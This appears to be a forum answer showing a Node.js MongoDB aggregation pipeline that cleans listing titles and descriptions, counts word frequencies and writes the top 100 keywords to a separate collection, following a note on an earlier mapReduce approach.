db.yourCollection.find({_id:ObjectId("553e435f20e6afc4b8aa0efb")})
Notes
While this approach may seem complicated at first (well, the mapReduce is a bit), it is actually pretty easy conceptually. Basically, you are trading real time results (which you won't have anyway unless you spend a lot of RAM) for speed. Imho, that's a good deal. To make the rather costly mapReduce phase more efficient, implementing incremental mapReduce could be an approach; improving my admittedly hacked mapReduce might well be another.
Last but not least, this way is a rather ugly hack altogether. You might want to dig into Elasticsearch or Lucene. Those products are, imho, much better suited for what you want.

Thanks to @Markus's solution, I came up with something similar using aggregations instead, given that map-reduce is flagged as deprecated in later versions.
const { MongoDBNamespace, Collection } = require('mongodb')
//.replace(/(\b(\w{1,3})\b(\W|$))/g,'').split(/\s+/).join(' ')
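// String.raw keeps the backslashes intact, so '\\b' reaches the server as a regex word boundary
const routine = String.raw`function (text) {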
const stopwords = ['the', 'this', 'and', 'or', 'id']
text = text.replace(new RegExp('\\b(' + stopwords.join('|') + ')\\b', 'g'), '')
text = text.replace(/[;,.]/g, ' ').trim()
return text.toLowerCase()
}`
// If the pipeline includes the $out operator, aggregate() returns an empty cursor.
const agg = [
{
$match: {
a: true,
d: false,
},
},
{
$project: {
title: 1,
desc: 1,
},
},
{
$replaceWith: {
_id: '$_id',
text: {
$concat: ['$title', ' ', '$desc'],
},
},
},
{
$addFields: {
cleaned: {
$function: {
body: routine,
args: ['$text'],
lang: 'js',
},
},
},
},
{
$replaceWith: {
_id: '$_id',
text: {
$trim: {
input: '$cleaned',
},
},
},
},
{
$project: {
words: {
$split: ['$text', ' '],
},
qt: {
$const: 1,
},
},
},
{
$unwind: {
path: '$words',
includeArrayIndex: 'id',
preserveNullAndEmptyArrays: true,
},
},
{
$group: {
_id: '$words',
docs: {
$addToSet: '$_id',
},
weight: {
$sum: '$qt',
},
},
},
{
$sort: {
weight: -1,
},
},
{
$limit: 100,
},
{
$out: {
db: 'listings_db',
coll: 'words',
},
},
]
// Closure for db instance only
/**
*
* @param { MongoDBNamespace } db
*/
module.exports = function (db) {
/** @type { Collection } */
let collection
/**
* Runs the aggregation pipeline
* @return {Promise}
*/
this.refreshKeywords = async function () {
collection = db.collection('listing')
// .toArray() to trigger the aggregation
// it returns an empty cursor so it's fine
return await collection.aggregate(agg).toArray()
}
}
Please adapt it to your needs; it should require only minimal changes.
